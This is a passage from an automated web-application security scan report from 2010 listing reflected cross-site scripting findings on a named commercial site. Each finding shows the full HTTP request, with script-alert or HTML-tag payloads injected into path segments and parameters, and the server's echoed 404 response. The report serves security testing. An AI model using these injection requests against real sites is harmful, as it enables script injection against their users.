<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images/rating/4half.gif?8c119<script>alert(1)</script>0f6e82a1262=1 was not found on this server.</p>
...[SNIP]...

2.2776. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b545f<script>alert(1)</script>adb4ba19a18 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailb545f<script>alert(1)</script>adb4ba19a18/4/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailb545f<script>alert(1)</script>adb4ba19a18/4/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2777. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bfbd7<script>alert(1)</script>e8e34976d17 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4bfbd7<script>alert(1)</script>e8e34976d17/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4bfbd7<script>alert(1)</script>e8e34976d17/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2778. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fbda1<script>alert(1)</script>d2791a0f523 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themesfbda1<script>alert(1)</script>d2791a0f523/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themesfbda1<script>alert(1)</script>d2791a0f523/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2779. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 28f9f<script>alert(1)</script>5eef107f536 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos28f9f<script>alert(1)</script>5eef107f536/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos28f9f<script>alert(1)</script>5eef107f536/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2780. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload cb3e9<script>alert(1)</script>0fbf8e6b44c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos/imagescb3e9<script>alert(1)</script>0fbf8e6b44c/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/imagescb3e9<script>alert(1)</script>0fbf8e6b44c/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2781. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload cfe88<script>alert(1)</script>2f4252ec528 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos/images/ratingcfe88<script>alert(1)</script>2f4252ec528/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images/ratingcfe88<script>alert(1)</script>2f4252ec528/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2782. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload c3c1c<script>alert(1)</script>3dfba1ae992 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos/images/rating/search.phpc3c1c<script>alert(1)</script>3dfba1ae992?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images/rating/search.phpc3c1c<script>alert(1)</script>3dfba1ae992?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2783. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload a81e0<a>80f15a1e82 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/4/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searcha81e0<a>80f15a1e82&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searcha81e0<a>80f15a1e82&opt=2 was not found on this server.</p>
...[SNIP]...

2.2784. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload e8246<a>b113fc603c was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/4/themes/kosmos/images/rating/search.php?keyword=search...e8246<a>b113fc603c&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images/rating/search.php?keyword=search...e8246<a>b113fc603c&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2785. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3de3d<script>alert(1)</script>41defd433 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&3de3d<script>alert(1)</script>41defd433=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&3de3d<script>alert(1)</script>41defd433=1 was not found on this server.</p>
...[SNIP]...

2.2786. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload ec806<a>8aa51d7789 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/4/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2ec806<a>8aa51d7789 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2ec806<a>8aa51d7789 was not found on this server.</p>
...[SNIP]...

2.2787. http://www.resellerbase.com/detail/4/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 131fa<script>alert(1)</script>d6b1098179a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail131fa<script>alert(1)</script>d6b1098179a/4/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail131fa<script>alert(1)</script>d6b1098179a/4/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2788. http://www.resellerbase.com/detail/4/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9d18a<script>alert(1)</script>1c3bf06188a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/49d18a<script>alert(1)</script>1c3bf06188a/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/49d18a<script>alert(1)</script>1c3bf06188a/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2789. http://www.resellerbase.com/detail/4/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9a914<script>alert(1)</script>1d9dc976fa6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes9a914<script>alert(1)</script>1d9dc976fa6/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes9a914<script>alert(1)</script>1d9dc976fa6/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2790. http://www.resellerbase.com/detail/4/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 92ea4<script>alert(1)</script>e2de87a845e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos92ea4<script>alert(1)</script>e2de87a845e/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos92ea4<script>alert(1)</script>e2de87a845e/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2791. http://www.resellerbase.com/detail/4/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5fd5b<script>alert(1)</script>d11b328e6b9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos/images5fd5b<script>alert(1)</script>d11b328e6b9/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images5fd5b<script>alert(1)</script>d11b328e6b9/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2792. http://www.resellerbase.com/detail/4/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 5399e<script>alert(1)</script>8cd0023ef6c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos/images/search.php5399e<script>alert(1)</script>8cd0023ef6c?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images/search.php5399e<script>alert(1)</script>8cd0023ef6c?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2793. http://www.resellerbase.com/detail/4/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload ff4c9<a>cc91c080e89 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

